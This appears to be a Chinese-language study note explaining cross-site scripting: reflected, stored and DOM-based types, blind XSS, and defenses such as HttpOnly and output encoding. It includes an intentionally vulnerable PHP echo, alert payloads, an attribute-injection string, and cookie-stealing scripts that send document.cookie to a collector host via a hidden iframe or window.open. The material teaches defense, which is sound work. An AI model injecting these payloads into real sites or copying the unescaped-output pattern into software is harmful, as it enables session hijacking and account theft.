安全学习笔记-web安全之XSS攻击

语言: CN / TW / HK
时间 2022-03-18 16:06:00
主题:

web安全之XSS攻击

XSS 即跨站脚本攻击,是 OWASP TOP10 之一。它的全称为 Cross-site scripting,因为 CSS 这个简称已经被占用表示为前端三剑客之一的CSS,所以简写为XSS。

原理

浏览器将用户输入的恶意内容当做脚本去执行,从而导致了恶意功能的执行,这是一种客户端攻击方式,是网站应用程序的安全漏洞攻击,是脚本代码注入的一种。可分为三个类型: 反射型存储型DOM型

反射型XSS

先来看下面示例

<?php
$input = $_GET["info"];
echo "<div>".$input."</div>"

?>

当用户在前端获取值通过url传递给后端时,上面代码将显示用户传递参数。如下:

思考:当传递参数本身为恶意代码时将会有怎么样的效果?如下:

http://localhost:3000/php_stu/xss_some/xss01.php?info=<script>alert(/xss/)</script>

效果就是会执行js的alert函数:

如果将 info=<script>alert(/xss/)</script> 替换成复杂逻辑代码可以获取用户信息做一些操作。例如改成如下代码: 

<script>
            p = window.location.pathname;
            c = document.cookie;
            ifm = document.createElement("iframe");
            document.body.appendChild(ifm);
            ifm.width = 0;ifm.height = 0;
            ifm.src = "http://localhost:3000/php_stu/xss_some/1.php?info=" + p + "&co" + c;
        </script>

根据如上代码请求后发现我的1.php网站获取到了用户的网站路径和用户cookie:

总结:反射型XSS只是简单地把用户输入的数据”反射给浏览器“。也就是说,黑客往往需要诱导用户点击一个恶意链接(如钓鱼邮件等),才能进行攻击。因此反射型XSS也叫做非持久型XSS。

存储型XSS

存储型XSS会把用户输入的数据存储在服务器,这种XSS危害性更大。比如在博客网站上,一个人在自己的信息上写一段脚本。如”自我介绍 <script>window.open("http://wwww.mysite.com?yourcookie=document.cookie")</script> “,而这个博客网站没有对自我介绍的内容进行正确的编码,当网站其他用户看到这个信息时,这个用户将会得到所有看他自我介绍的用户的会话cookie。更严重的是,如果攻击者的恶意代码可以自我扩散,特别是在社交网络上,就会形成蠕虫,早期的samy worm就是如此。

下面就是存储型XSS的一个应用场景:

基于DOM的XSS

基于DOM的XSS和反射型XSS原理基本上一样,不同的是基于DOM的XSS在服务器端没有办法控制,必须在客户端控制,因为不经过服务端,所以可以绕过WAF等的检测。DOM是前端HTML的概念,最好需先去了解下前端DOM树的概念。

比如有一网站代码如下:

<script>
    function test() {
        var inpStr = document.getElementById("usr").value;
        document.getElementById("link").innerHTML = "<a href='"+inpStr+"' >testLink</a>";
    }
</script>

<div id="link"></div>
<input type="text" id="usr" value="" />
<input type="button" id="tmp" value="show" onclick="test()" />

效果如下:

点击show按钮之后生产一个超链接:

如果我在input输入框内输入如下字符串 ' onclick=alert(/xss/) ' 将得到如下效果:

得到的超链接标签内容为 <a href='' onclick=alert(/xss/) ''> testLink</a>

跨站(XSS)盲打

这里再介绍下XSS盲打,XSS盲打就是尽可能地于一切可能的地方提交XSS语句,比如某些网站用户给站长投信反馈意见,如果管理员看到此xss语句就能获取到管理员的cookie信息。

XSS防范

  • HttpOnly

    HttpOnly由微软提出,在IE6中实现,目前主流浏览器都支持,意思是浏览器将禁止页面的JavaScript访问带有HttpOnly属性的Cookie。这样HttpOnly可以有效防止Cookie劫持。

  • 转义特殊字符

    • '&'
    • '"'
    • '''
    • '<'
    • '>'

  • 安全编码

    对后端传输到前端的输出进行编码,防止其被解析成为动态内容。比如php编程里的htmlentities()和htmlspecialchars()函数,python中django模板里的escape等。

总的来说坚持输入和输出不可信。